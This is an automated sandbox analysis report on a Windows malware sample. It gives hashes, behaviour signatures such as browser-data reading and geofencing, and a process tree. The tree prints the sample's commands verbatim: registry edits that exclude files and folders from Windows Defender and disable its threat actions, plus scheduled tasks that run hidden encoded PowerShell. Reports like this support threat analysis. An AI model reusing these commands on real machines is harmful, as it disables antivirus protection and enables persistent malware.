Analysis
-
max time kernel
140s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20231127-en -
resource tags
-
submitted
07-12-2023 19:54
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
fca38988f95f893355d9f020a1f71ee3
-
SHA1
c3b9647467c9b434ba6a796c05f27a350c6fd8c8
-
SHA256
aae089ffc7f6e35506106b454fd2edfc4941467e06f76d173f9cbd9e02110031
-
SHA512
266566c7ec8057122c5ca08dc00c16c5c9e73ea552c4c3fbc5a41c56e2fb2852b8dbc1dd2161980609d750cc0d120f2d074445585cbe5bf33c6beb2ed5bfb36c
-
SSDEEP
196608:91OUHIbPGg9PaDD9zATbAXqXWAXz2v/tBDPRb7S:3OUIb+Iiwk6mPv/tVRq
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Drops file in System32 directory 29 IoCs
-
Drops file in Program Files directory 14 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 45 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS22B6.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS2882.tmp\Install.exe.\Install.exe /bAdPdidLC "525403" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gyionljGJ" /SC once /ST 03:59:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gyionljGJ"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gyionljGJ"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bQrKcOXclPyMmQgfTY" /SC once /ST 19:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\bKklmMU.exe\" BX /LNsite_idDPi 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\bKklmMU.exeC:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\bKklmMU.exe BX /LNsite_idDPi 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PhaWElAePoHhBdUTFeR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PhaWElAePoHhBdUTFeR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bJazgiTXFJUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bJazgiTXFJUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\icEyDogKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\icEyDogKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycMZCyUlVfbU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycMZCyUlVfbU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yczsUHdtPuMxC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yczsUHdtPuMxC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\sUklQelueKqzsVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\sUklQelueKqzsVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\szdKxxrFMiVXCdXj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\szdKxxrFMiVXCdXj\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\sUklQelueKqzsVVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\szdKxxrFMiVXCdXj /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\sUklQelueKqzsVVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\szdKxxrFMiVXCdXj /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:323⤵
-
